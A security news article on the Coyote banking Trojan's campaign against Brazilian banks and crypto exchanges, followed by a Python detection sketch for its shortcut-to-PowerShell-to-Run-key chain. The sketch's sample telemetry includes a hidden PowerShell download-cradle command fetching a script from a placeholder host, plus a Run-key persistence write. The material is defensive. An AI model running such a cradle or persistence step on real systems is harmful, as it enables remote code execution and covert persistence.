Coyote Malware Surge: Expanded Campaign Targets Financial Institutions

By: Austin Ukpebor - February 3, 2025

A new wave of Coyote malware infections is sweeping across Brazil, posing a serious threat to financial institutions and Windows users. Originally documented by Kaspersky in early 2024, Coyote has evolved into a sophisticated banking Trojan capable of harvesting sensitive data through keylogging, phishing overlays, and system reconnaissance. Recent reports reveal that the malware now targets over 1,030 websites and 73 financial institutions, marking a significant expansion in its operational scope.

The infection chain begins with a Windows Shortcut (LNK) file that executes a PowerShell command, which retrieves additional scripts from a remote server. This multi-stage process culminates in the deployment of a malicious payload that establishes persistence by modifying the Windows registry. Once embedded, Coyote can capture keystrokes, take screenshots, and display fake login screens to trick users into divulging credentials. It also scans for installed antivirus software to evade detection.

Coyote’s expanded target list includes major Brazilian financial platforms such as mercadobitcoin.com.br and bitcointrade.com.br, indicating a strategic focus on cryptocurrency and digital banking services. When a victim attempts to access one of these sites, the malware communicates with an attacker-controlled server to determine its next move—whether to activate a keylogger, capture a screenshot, or deploy a phishing overlay.

Security experts warn that Coyote’s use of PowerShell and registry manipulation makes it particularly stealthy, allowing it to bypass traditional endpoint defenses. Its modular design and ability to adapt to different financial environments suggest that it may continue to evolve, potentially spreading beyond Brazil.

Organizations are urged to implement proactive defenses, including disabling unnecessary scripting features, monitoring registry changes, and deploying behavior-based detection tools. As malware campaigns grow more targeted and evasive, financial institutions must remain vigilant to protect customer data and operational integrity.
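The two steps of the infection chain described above (a PowerShell download cradle started from a shortcut, then a registry Run-key write for persistence) are exactly what the recommended registry and behaviour monitoring should catch. The following detection sketch is an added example, not code from the article or from any vendor; it runs over constructed, Sysmon-like process-creation and registry-set records, and all pids, paths, the registry key and the hostname are made up.

```python
import re

# Heuristics for the two steps the article describes: a PowerShell download
# cradle started from a shortcut, then a Run-key write for persistence.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|-EncodedCommand|-enc\b", re.I)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)

def parse_event(line):
    """Parse one 'key=value|key=value' record (constructed log format)."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def detect(lines):
    """Return alert strings for the LNK -> PowerShell -> Run-key chain.
    Explorer is the usual parent of a double-clicked LNK, so a powershell.exe
    child of explorer.exe carrying a download cradle starts a tracked chain;
    any Run-key write by that chain (or its descendants) is reported."""
    alerts, chain = [], set()
    for ev in map(parse_event, lines):
        if ev["type"] == "process_create":
            image, parent = ev["image"].lower(), ev["parent_image"].lower()
            if ev["parent_pid"] in chain:
                chain.add(ev["pid"])          # descendants inherit suspicion
            elif (image.endswith("powershell.exe") and parent.endswith("explorer.exe")
                  and CRADLE_RE.search(ev["cmdline"])):
                chain.add(ev["pid"])
                alerts.append(f"pid {ev['pid']}: PowerShell download cradle spawned by Explorer (LNK-style start)")
        elif ev["type"] == "registry_set" and ev["pid"] in chain and RUN_KEY_RE.search(ev["target"]):
            alerts.append(f"pid {ev['pid']}: Run-key persistence written by the chain: {ev['target']}")
    return alerts

# Constructed sample telemetry; pids, paths, SID and hostname are made up.
SAMPLE_EVENTS = [
    "type=process_create|pid=4120|parent_pid=1001|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|parent_image=C:\\Windows\\explorer.exe|cmdline=powershell -w hidden -c (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s2.ps1')",
    "type=process_create|pid=4188|parent_pid=4120|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|parent_image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmdline=powershell -nop -f C:\\Users\\Public\\s2.ps1",
    "type=registry_set|pid=4188|target=HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
    # Benign: an admin script launched from Explorer with no cradle, then its own Run key.
    "type=process_create|pid=5200|parent_pid=1001|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|parent_image=C:\\Windows\\explorer.exe|cmdline=powershell -File C:\\Scripts\\backup.ps1",
    "type=registry_set|pid=5200|target=HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The benign records show why the Run-key write alone is not the signal: only a write by a process descended from the Explorer-spawned cradle is reported.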